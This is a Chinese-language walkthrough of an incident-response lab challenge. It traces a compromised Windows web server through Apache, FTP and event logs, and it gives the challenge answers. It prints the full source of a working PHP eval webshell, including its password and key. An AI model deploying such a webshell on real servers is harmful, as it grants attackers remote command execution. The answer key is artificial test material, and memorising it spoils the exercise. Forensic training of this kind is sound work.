应急响应web2

在解题前，请确保您已解的一下内容:

1.攻击者的IP地址（两个）？

2.攻击者的webshell文件名？

3.攻击者的webshell密码？

4.攻击者的QQ号？

5.攻击者的服务器伪IP地址？

6.攻击者的服务器端口？

7.攻击者是如何入侵的（选择题）？

8.攻击者的隐藏用户名？

一、两个ip地址

扫描出来是一个system.php文件

<?php @session_start(); @set_time_limit(0); @error_reporting(0); function encode($D,$K){ for($i=0;$i<strlen($D);$i++) { $c = $K[$i+1&15]; $D[$i] = $D[$i]^$c; } return $D; } $pass='hack6618'; $payloadName='payload'; $key='7813d1590d28a7dd'; if (isset($_POST[$pass])){ $data=encode(base64_decode($_POST[$pass]),$key); if (isset($_SESSION[$payloadName])){ $payload=encode($_SESSION[$payloadName],$key); if (strpos($payload,"getBasicsInfo")===false){ $payload=encode($payload,$key); } eval($payload); echo substr(md5($pass.$key),0,16); echo base64_encode(encode(@run($data),$key)); echo substr(md5($pass.$key),16); }else{ if (strpos($data,"getBasicsInfo")!==false){ $_SESSION[$payloadName]=encode($data,$key); } } }

这段PHP代码是一个典型的Webshell后门程序，用于在受感染的服务器上执行远程命令。

然后我们分析日志。

日志路径C:\phpstudy_pro\Extensions\Apache2.4.39\logs

192.168.126.135

接下来我们分析windows的系统日志，使用APT-Hunter工具的powershell日志收集器自动收集日志信息，将得到的日志解压。

Powershell：

cd C:\你的路径\APT-Hunter-3.2

解除系统默认脚本执行限制（仅首次需要）：

Set-ExecutionPolicy RemoteSigned # 弹出提示输入 Y 确认

一键自动采集命令：

.\windows-log-collector-full-v3-CSV.ps1

使用 APT-Hunter 主 Python 脚本自动分析这批日志：

python APT-Hunter.py -p C:\Users\Administrator\Desktop\logs\wineventlog -o Project1 -allreport -p：提供包含使用powershell日志收集器提取的日志的解压路径 -o：输出生成项目的名称

192.168.126.129

二、攻击者的webshell文件名？

system.php

三、攻击者的webshell密码？

hack6618

四、攻击者的QQ号？

Tecent files 腾讯文件（可能指的是QQ之类的）

攻击者的QQ号：777888999321

五、攻击者的服务器伪IP地址？

在隐藏用户的文件中搜集信息：

FileRecv为QQ的接收的文件夹，发现frp内网穿透工具

找到配置信息查看：

256.256.66.88

六、攻击者的服务器端口？

65536

七、攻击者是如何入侵的（选择题）？

查看ftp日志文件：

分析日志文件，查找后门system.php文件，发现正在进行爆破

八、攻击者的隐藏用户名？

hack887

成功